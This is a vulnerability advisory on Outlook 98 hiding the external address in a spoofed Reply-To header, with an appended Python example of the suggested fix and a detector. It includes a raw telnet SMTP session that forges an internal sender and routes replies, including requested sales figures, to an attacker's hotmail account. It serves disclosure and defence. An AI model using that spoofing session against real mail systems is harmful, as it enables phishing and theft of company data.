COMMAND

    Outlook

SYSTEMS AFFECTED

    Outlook 98

PROBLEM

    Nate Lawson found the following. Outlook uses a sender's Reply-To
    address silently, allowing a user to inadvertently send data to an
    Internet mail account when intending to reply to an internal,
    trusted user. Anyone on the Internet can spoof a trusted internal
    Exchange user and get replies sent back to themselves without the
    user knowing they weren't responding to another internal user.
    How to reproduce:

    1. Spoof mail as an internal user with a Reply-To address claiming
       to be an internal user, but an address of an Internet  account,
       say hotmail.
    2. Go into Outlook and read the mail.  The mail looks like it  was
       internally  generated  but  viewing  the  full Internet headers
       under View->Options shows the bogus Reply-To header.
    3. Hit Reply in Outlook.   The To: field looks like it's  going to
       a valid internal  user, but right  clicking on it  and choosing
       Properties shows that the internal user it is sending the reply
       to is actually an Internet address.
    4. Enter some text  and hit Send.   Observe that the mail  went to
       the attacker's account, not the internal one.

    A quick script:

        {root 5:00pm} ~> telnet mail.example.com 25
        Trying 10.20.2.5...
        Connected to mail.example.com.
        Escape character is '^]'.
        220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
        helo losebag
        250 OK
        mail from:<>
        250 OK - mail from <>
        rcpt to:<accounting@example.com>
        250 OK - Recipient <accounting@example.com>
        data
        354 Send data.  End with CRLF.CRLF
        From: Nate Lawson
        To: Accounting
        Reply-To: Nate Lawson<intruder@hotmail.com>
        Subject: important!

        Please reply with the latest copy of our sales figures!

        Thanks,
        Nate
        .
        250 OK
        quit
        221 closing connection
        Connection closed by foreign host.

    Now, a reply to the email will go not to the trusted internal user
    Nate Lawson <nlawson@example.com> but to the attacker,
    <intruder@hotmail.com>. Worse, the user sees no indication that the
    mail is outward-bound! The To: field on the reply simply shows
    "Nate Lawson", a valid internal user. The problem seems to be that
    Outlook (in the default setup) hides the address part of the
    Reply-To header when using it to create the value to put in the
    "To" box of the reply. The other mail readers it was tested on
    (Hotmail and Netscape Messenger) showed the Reply-To header in
    full.

SOLUTION

    Suggested fix: always show the full email address of any recipient
    that is not local (i.e. username@example.com would be hidden but
    any instance of user@hotmail.com would be shown). Microsoft has
    been notified, but claimed this was a weakness in SMTP and would
    not be fixed until a secure successor to SMTP is implemented. They
    obviously missed the point: the error is not that mail can be
    forged, but that Outlook allows a user to respond to a message that
    looks local and legitimate, but is actually destined for an outside
    address.
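    The following is an added example, not code from the advisory or
    from Microsoft, illustrating the suggested fix and a matching
    defender-side check. It picks the reply target the way the advisory
    describes Outlook doing it (Reply-To if present, else From), renders
    the To: field so that any non-local recipient is shown with its full
    address, and separately flags a message whose visible sender looks
    internal while its Reply-To points outside. The local domain
    (example.com), the two constructed sample messages and the helper
    names are assumptions made for the example.

```python
from email import message_from_string
from email.utils import parseaddr

# Assumption: the organisation's own mail domain (the advisory's example.com).
LOCAL_DOMAIN = "example.com"

# Constructed sample: the forged message from the advisory's SMTP session.
SPOOFED = """\
From: Nate Lawson
To: Accounting
Reply-To: Nate Lawson <intruder@hotmail.com>
Subject: important!

Please reply with the latest copy of our sales figures!
"""

# Constructed sample: a genuine internal message, for comparison.
GENUINE = """\
From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Subject: sales figures

Attached.
"""


def load(raw):
    """Parse a raw RFC 822 message string into a Message object."""
    return message_from_string(raw)


def split_address(header):
    """Return (display_name, addr) for one address header.
    A header carrying no address at all, such as the advisory's
    'From: Nate Lawson', yields the whole text as the name and an empty addr."""
    header = (header or "").strip()
    name, addr = parseaddr(header)
    if "@" not in addr:
        return header, ""
    return name, addr


def is_local(addr, local_domain=LOCAL_DOMAIN):
    """True if addr belongs to the local domain."""
    return addr.lower().endswith("@" + local_domain.lower())


def reply_target(msg):
    """The (name, addr) a reply goes to: Reply-To when present, else From."""
    return split_address(msg.get("Reply-To") or msg.get("From"))


def render_recipient(name, addr, local_domain=LOCAL_DOMAIN):
    """Suggested fix: a local recipient may be shown by display name alone,
    but a recipient outside the local domain is always shown with its
    full address, so 'Nate Lawson <intruder@hotmail.com>' cannot hide."""
    if is_local(addr, local_domain):
        return name or addr
    return f"{name} <{addr}>" if name else addr


def reply_redirect_warning(msg, local_domain=LOCAL_DOMAIN):
    """Gateway or client-side check: flag mail whose Reply-To sends replies
    outside the local domain while the visible sender looks internal
    (local address, or a bare display name with no address at all).
    Returns a reason string, or None when nothing looks wrong."""
    from_name, from_addr = split_address(msg.get("From"))
    rt_name, rt_addr = split_address(msg.get("Reply-To"))
    if not rt_addr or is_local(rt_addr, local_domain):
        return None
    sender_looks_internal = is_local(from_addr, local_domain) or not from_addr
    if sender_looks_internal:
        return (f"Reply-To redirects replies for '{from_name or rt_name}' "
                f"to external address {rt_addr}")
    return None


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("genuine", GENUINE)):
        msg = load(raw)
        name, addr = reply_target(msg)
        print(f"{label}: reply To: field -> {render_recipient(name, addr)}")
        print(f"{label}: warning -> {reply_redirect_warning(msg)}")
```

    Run as a script it prints the To: field each sample would get under
    the suggested rendering rule, and the warning (if any) the check
    raises; the spoofed sample renders with the hotmail address visible
    and is flagged, the genuine one renders by display name and is not.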